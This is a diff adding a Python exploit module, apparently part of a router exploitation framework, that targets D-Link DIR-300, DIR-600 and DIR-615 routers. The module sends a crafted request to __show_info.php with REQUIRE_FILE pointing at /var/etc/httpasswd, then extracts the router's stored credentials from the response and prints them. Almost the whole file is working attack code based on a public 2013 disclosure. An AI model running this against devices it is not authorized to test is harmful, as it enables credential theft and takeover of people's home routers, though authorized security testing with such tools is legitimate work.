dir300_600 and 615 information disclosure exploit

modules/exploits/dlink/dir300_600_info.py

@@ -0,0 +1,54 @@
+# Name:D-link DIR-300 DIR-600 and DIR-615 information disclosure
+# File:dir300_600_info.py
+# Author:Ján Trenčanský
+# License: GNU GPL v3
+# Created: 18.07.2016
+# Last modified: 18.07.2016
+# Shodan Dork:
+# Description: Information disclosure on DIR-300, DIR-600 and DIR-615(4.0)
+# Based on: http://seclists.org/bugtraq/2013/Dec/11
+
+import core.Exploit
+import core.io
+
+import requests
+import re
+from interface.messages import print_error, print_yellow, print_success, print_green
+
+
+class Exploit(core.Exploit.RextExploit):
+    """
+Name:D-link DIR-300 DIR-600 and DIR-615 information disclosure
+File:dir300_600_info.py
+Author:Ján Trenčanský
+License: GNU GPL v3
+Created: 18.07.2016
+Description: Information disclosure on DIR-300, DIR-600 and DIR-615(4.0)
+Based on: http://seclists.org/bugtraq/2013/Dec/11
+
+Options:
+    Name        Description
+
+    host        Target host address
+    port        Target port
+    """
+    password = ""
+
+    def __init__(self):
+        core.Exploit.RextExploit.__init__(self)
+
+    def do_run(self, e):
+        url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port)
+
+        try:
+            print_yellow("Sending exploit")
+            response = requests.get(url, timeout=60)
+            if response.status_code == 200 and "<center>" in response.text:
+                print_success("credentials fetched")
+                credentials = re.findall("<center>\n\t\t\t(.*)", response.text)
+                print_green(credentials[0])
+        except requests.Timeout:
+            print_error("timeout")
+        except requests.ConnectionError:
+            print_error("exploit failed")
+Exploit()